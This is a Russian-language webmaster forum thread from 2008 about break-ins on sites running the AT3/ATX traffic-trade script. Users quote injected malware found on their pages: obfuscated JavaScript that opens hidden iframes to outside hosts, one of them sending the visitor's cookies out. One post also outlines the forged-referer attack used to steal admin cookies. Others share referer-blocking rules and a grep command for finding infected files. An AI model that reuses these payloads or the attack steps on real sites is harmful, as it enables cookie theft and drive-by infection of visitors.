Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
 Добавлено: 12/03/08 в 18:45 |
Это до этого обсуждалось как он вставляет, гдето то топик был. А так на шаблоны лучше поставить 444.
|
|
|
|
| |
С нами с 07.09.04
Сообщения: 763
Рейтинг: 874
|
| Добавлено: 12/03/08 в 22:52 |
афтар АТЛ отписал что 17й билд выпустил. но самого дистриба я так и не нашел у них на сайте.
|
|
|
|
| |
С нами с 28.10.05
Сообщения: 179
Рейтинг: 118
|
| Добавлено: 12/03/08 в 23:12 |
Вот такую х-ню нашел сегодня на морде одного из своих сиджей:
| Код: | | <script> var s='3C696672616D65207372633D22687474703A2F2F65626F6E792D68617264636F72652E6E65742F73747265616D726F7461746F722F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.appVersion; if (v.indexOf('MSIE 6.0') != -1){document.write(unescape(o));}if (v.indexOf('MSIE 5.') != -1){document.write(unescape(o));}</script> |
Что бы это значило? Интересность в том, что этот код я вижу с ноута подключенного к инету через ПК, а с самого ПК я его не вижу...
непонятно... 
|
|
|
|
Если где-то нет кого-то, значит кто-то где-то есть...
|
0
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 12/03/08 в 23:42 |
Это тут много раз обсуждалось поищи топики про взломы ат3. Код после тэга <body> там много пробелов обычно вставляет. (вот один из таких топиков Защищаем свои сиджи от взлома )
Насчет 17 билда там же написано что он на подходе, а не вышел еще.
Последний раз редактировалось: Kitaa (12/03/08 в 23:45), всего редактировалось 1 раз
|
|
|
|
| |
С нами с 12.12.03
Сообщения: 109
Рейтинг: 63
|
| Добавлено: 12/03/08 в 23:45 |
| penelo писал: | Вот такую х-ню нашел сегодня на морде одного из своих сиджей:
| Код: | | <script> var s='3C696672616D65207372633D22687474703A2F2F65626F6E792D68617264636F72652E6E65742F73747265616D726F7461746F722F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.appVersion; if (v.indexOf('MSIE 6.0') != -1){document.write(unescape(o));}if (v.indexOf('MSIE 5.') != -1){document.write(unescape(o));}</script> |
Что бы это значило? Интересность в том, что этот код я вижу с ноута подключенного к инету через ПК, а с самого ПК я его не вижу...
непонятно... |
<iframe src="http://ebony-hardcore.net/streamrotator/z/static.php" width=2 height=2 style="display:none"></iframe>
|
|
|
|
| |
Мир всем местным.
С нами с 25.02.06
Сообщения: 2194
Рейтинг: 496
|
| Добавлено: 13/03/08 в 18:39 |
Говорю слова благодарности товарищу Soft-Com.
Быстро откликнулся на мою проблему, всячески мне помогал и помогает. Спасибо тебе огромное 
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 13/03/08 в 19:08 |
судя по всему есть еще один метод вытягивания логина и пароля к АТ3/АТХ.
суть метода:
1. сделать подставной запрос на http://domain.com/cgi-bin/in.cgi с реферером необходимого формата, а реферер - заенкоденый тот же самый троян
2. тупорылый in.cgi ебанутого АТ засовывает этот клик в нотрейд-траффик
3. человек, проавторизовавшись, заходит св страницу просмотра нотрейд трафика, и троян дампит куки на определённый адрес.
как это обнаружить:
в админке в notrade траффике если есть заходы типа
http://alfaporn.com/?"%26gt;%26lt;script%26gt;document.write(unesca…6d%65%6...
значит вам засадили трояна в админку
как лечить - фактически никак, но можно грохнуть статистику (или некоторые записи) из файла статистики, например
cgi-bin/at3/l/in/072-18-36
и т.д.
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 13/03/08 в 22:34 |
неплохо работает такой вариант защиты:
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC]
RewriteRule .* http://google.com/ [L]
|
|
|
|
| |
С нами с 02.09.06
Сообщения: 598
Рейтинг: 613
|
| Добавлено: 14/03/08 в 00:20 |
По-моему тут спасет только гильотина. 4 месяца ломают серваки один за другим, а автор и не чешется.
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 14/03/08 в 10:11 |
Да и дыра-то глупая какая-то...
Все бля просто до гениальности...
2 Soft-Com еще раз РЕСПЕКТ!
Ты просто монстр!
2 supphosting.com точна! Я уже на выходные наметил план сноса атл! Заиппала его дырявость просто вусмерть!
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 14/03/08 в 10:22 |
| Soft-Com писал: | судя по всему есть еще один метод вытягивания логина и пароля к АТ3/АТХ.
суть метода:
1. сделать подставной запрос на http://domain.com/cgi-bin/in.cgi с реферером необходимого формата, а реферер - заенкоденый тот же самый троян
2. тупорылый in.cgi ебанутого АТ засовывает этот клик в нотрейд-траффик
3. человек, проавторизовавшись, заходит св страницу просмотра нотрейд трафика, и троян дампит куки на определённый адрес.
как это обнаружить:
в админке в notrade траффике если есть заходы типа
http://alfaporn.com/?"%26gt;%26lt;script%26gt;document.write(unesca…6d%65%6...
значит вам засадили трояна в админку
как лечить - фактически никак, но можно грохнуть статистику (или некоторые записи) из файла статистики, например
cgi-bin/at3/l/in/072-18-36
и т.д. |
Да, есть такая шняга...
Просмотрел исходник страницы:
| Код: | <script>document.write(unescape('%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%75%6e%69%73%74%61%66%66%2e%72%75%2f%6a%73%2f%73%61%76%65%72%2e%70%68%74%6d%6c%3f')+'domain.com'+unescape('%26%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%2b%27%22%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3c%2f%73%63%72%69%70%74%3e'))</script>
<script>document.write(unescape('%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%75%6e%69%73%74%61%66%66%2e%72%75%2f%6a%73%2f%73%61%76%65%72%2e%70%68%74%6d%6c%3f')+'www.domain.com'+unescape('%26%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%2b%27%22%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3c%2f%73%63%72%69%70%74%3e'))</script> |
Надеюсь, отключение js перед просмотром предотвратило срабатывание кода...
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 14/03/08 в 10:52 |
у кого есть дедики - можно проверить статистику (а заодно и сеьюре-логи) на наличие трояна такой командой через ssh:
| Код: |
cd /tmp;
for file in `locate x2.cgi`; do path=`echo $file | awk -F"/x/x2.cgi" '{print $1}'`; grep -r "document.write(unesca" $path/l/* | awk -F":" '{print $1}'; done
|
понятно что это нужно делать от рута, или юзера у которого есть rw доступ к контенту всех доменов.
в результате команда выдаст список файлов в которых есть код трояна.
|
|
|
|
| |
С нами с 16.12.05
Сообщения: 1260
Рейтинг: 358
|
| Добавлено: 14/03/08 в 11:39 |
| Soft-Com писал: | судя по всему есть еще один метод вытягивания логина и пароля к АТ3/АТХ.
суть метода:
1. сделать подставной запрос на http://domain.com/cgi-bin/in.cgi с реферером необходимого формата, а реферер - заенкоденый тот же самый троян
2. тупорылый in.cgi ебанутого АТ засовывает этот клик в нотрейд-траффик
3. человек, проавторизовавшись, заходит св страницу просмотра нотрейд трафика, и троян дампит куки на определённый адрес.
|
Так вроде в последних версиях AT он сделал пароль зашифрованным. Т.е. даже если троян отошлет ему дамп твоих кук, то по идее он его хер расшифрует потом?
|
|
|
|
| |
С нами с 07.09.04
Сообщения: 763
Рейтинг: 874
|
| Добавлено: 14/03/08 в 12:15 |
Soft-Com
глянь приз с каких Ip это говно подсовывают. мож опять 1-2 адреса будет.
|
|
|
|
| |
С нами с 18.01.07
Сообщения: 169
Рейтинг: 228
|
| Добавлено: 14/03/08 в 14:26 |
Проверил логи, тоже самое, те же айпишники, но в коде страниц фрейма не было.
Поставил доступ в админку только по определенным айпишникам + айпи этого красавца везде где только можно было побанил.
В последнее время все больше склоняюсь к варианту сменить этот гребанный at3, прийдется конечно убить на это некоторое время, но нервы дороже.
|
|
|
|
| |
Маг.
С нами с 04.10.04
Сообщения: 940
Рейтинг: 349
|
| Добавлено: 14/03/08 в 15:43 |
Ебанутся.
Ттоесть каждый раз как входиш в ат3 - рискуеш подцепить трояна. Без JS то в админку не войти впринципе.
|
|
|
|
Администрируем серваки, telegram: https://t.me/akamitch
|
0
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 15/03/08 в 20:54 |
в АТ есть бага, через которую можно залить php-shell (типа r57shell например) на сервер.
рекомендую заменить проверку реферера на такую чтобы это полечить:
| Код: |
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC]
RewriteRule .* http://google.com/ [L]
|
т.к. товарищи багописатели не ответили на моё первое письмо, я запостил тему на их форуме:
http://www.arrowscripts.com/forums/index.php?showtopic=3369
Прошу всех оунеров АТХ отметится, у кого стоит ATL3 - советую сменить на протон (это не реклама).
если кому-то нужна небезвозмездная помощь в оптимизации серверов под протон - обращайтесь, не стесняйтесь .
думаю тему можно закрыть, потому что это стало напоминать бесконечную историю - II.
всем кому помог - можете поблагодарить + в репутацию
|
|
|
|
| |
♣ MAFIA ♣
С нами с 03.07.07
Сообщения: 1657
Рейтинг: 2246
|
| Добавлено: 16/03/08 в 03:21 |
они этот топик удалили почемуто 
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 16/03/08 в 04:19 |
Да уж ...
Походу забили они на своих юзеров.
Буду выбирать между ept и ftt.
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 16/03/08 в 07:29 |
| Foxy Babe писал: | | они этот топик удалили почемуто |
вот что мне отписал модератор их форума:
| Цитата: | Re: vulnerabilities ( From: angelis )
I've set your post to invisible, no point showing the world things like this. I'll pass the message to Admin and he can respond to you.
angelis is a member of the Fuckers group and has 912 posts.
Sent on: Yesterday, 10:06 PM |
товарищи таким вот методом свою репутацию берегут ...
|
|
|
|
| |
С нами с 11.01.07
Сообщения: 3607
Рейтинг: 2686
|
| Добавлено: 16/03/08 в 15:44 |
Наверно не совсем хороший повод, но все же хотелось бы упомянуть SmartCJ - мы про пользователей не забываем :) ну и от перехвата пароля к админке скрипт защищен.
|
|
|
|
| |
С нами с 29.05.05
Сообщения: 673
Рейтинг: 294
|
| Добавлено: 16/03/08 в 16:08 |
| Цитата: | | Наверно не совсем хороший повод, но все же хотелось бы упомянуть SmartCJ - мы про пользователей не забываем ну и от перехвата пароля к админке скрипт защищен. |
Так уже давно бы сделали за процент от кликов свой смартсдж..
а так не совсем корректное упоминание о скрипте, он ведь платный.
|
|
|
|
| |
Тыц
С нами с 23.10.06
Сообщения: 692
Рейтинг: 411
|
| Добавлено: 16/03/08 в 17:36 |
| Цитата: | Так уже давно бы сделали за процент от кликов свой смартсдж..
а так не совсем корректное упоминание о скрипте, он ведь платный. |
+1, попробовал бы скрипт на небольших сайтах, чтоб понять как там и что, просто покупать софт за 300 баксов не имея уверенности, что он меня устроит я не очень хочу =(
|
|
|
|
| |
С нами с 10.08.03
Сообщения: 556
Рейтинг: 127
|
| Добавлено: 17/03/08 в 00:23 |
Ну по функционалу смартсж точно обгоняет все остальные существующие на рынке. А фришной версии хоть и нету, зато у саппорта хватает времени своим клиентам вовремя и качественно поддержку оказывать.
|
|
|
|
| |
С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843
|
| Добавлено: 17/03/08 в 00:53 |
пожалуйста объясните в одном предложении - уязвимость только для АТ3 или для АТХ тоже?
спасибо
|
|
|
|
| |
